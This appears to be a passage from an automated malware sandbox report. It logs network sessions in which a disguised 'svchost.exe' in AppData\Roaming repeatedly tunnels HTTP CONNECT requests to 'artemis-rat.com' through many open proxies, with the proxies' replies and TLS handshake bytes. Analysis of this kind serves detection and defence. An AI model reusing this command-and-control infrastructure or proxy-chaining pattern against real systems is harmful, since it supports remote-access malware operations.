                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1894192.168.2.55603136.94.2.13844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.055522919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1895192.168.2.55603336.94.2.13844343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.056265116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1896192.168.2.555847185.162.230.2018043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.058954000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.213136911 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1897192.168.2.555747138.68.155.221171243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.062728882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.870660067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880415916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.677212954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1898192.168.2.55558794.131.63.1205837843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.066034079 CET1260INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/6.0.0-20220501-re899e0c27
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 3670
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    Cache-Status: ezproxies.com
                                                                                    Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1899192.168.2.555856104.22.1.1138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.068859100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.223542929 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1900192.168.2.555861104.18.220.958043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.070951939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.225425959 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1901192.168.2.555669103.163.51.2548043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.088821888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.489624023 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1902192.168.2.55579752.196.1.1828043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.090589046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.356450081 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:28.356853008 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a3 88 a2 1e 4e fb 89 34 1f 4a 63 25 cd 98 45 d4 41 3c 25 55 a5 82 c9 54 21 2a 89 49 1f 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRN4Jc%EA<%UT!*I*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:28.622718096 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 bb f9 c9 50 c9 13 52 bb 77 33 53 ee c7 7b ec e4 a6 38 d5 a2 7c 72 29 c4 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9PRw3S{8|r)DOWNGRD0000*H010Uartemis-rat.com0240309120120Z260309120120Z010Uartemis-rat.com0"0*H0LU,m-YLa
                                                                                    Mar 9, 2024 13:14:28.652146101 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b5 57 1b 35 e3 da 34 ec b4 83 a6 43 65 88 4b e5 4b 44 08 bf b5 06 71 d8 57 b3 d0 eb 09 43 84 11 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 44 fc 85 c5 ac 4d 83 ea 20 96 2c e4 50 f3 6c bb ca 6a 4c 4a ba
                                                                                    Data Ascii: %! W54CeKKDqWC(DM ,PljLJ9O%iUq
                                                                                    Mar 9, 2024 13:14:28.917061090 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 fc 12 c1 26 93 b7 5a 91 ed 99 ec 63 e9 59 5a 0c 1b 78 3e 64 ea 08 38 12 47 82 9e 33 7f 9b d4 0e 8d cd 5b e9 fe a0 fd 09
                                                                                    Data Ascii: (&ZcYZx>d8G3[


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1903192.168.2.555642102.132.201.2028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.121340036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.940201044 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1904192.168.2.555732134.209.105.209312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.121387005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.469595909 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1905192.168.2.555894142.4.123.418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.122670889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1906192.168.2.55578751.89.173.40310043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.123049021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.870847940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880521059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.880659103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.677906990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1907192.168.2.55568413.234.24.116312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.124212027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.526865005 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1908192.168.2.5557705.135.83.2148043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.124268055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.603543997 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1909192.168.2.555435117.160.250.134889943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:28.124272108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.380073071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.882812023 CET303INHTTP/1.1 400 Bad Request
                                                                                    Server: openresty
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 154
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1910192.168.2.555783185.217.136.67133743312C:\Users\user\AppData\Roaming\svchost.exe
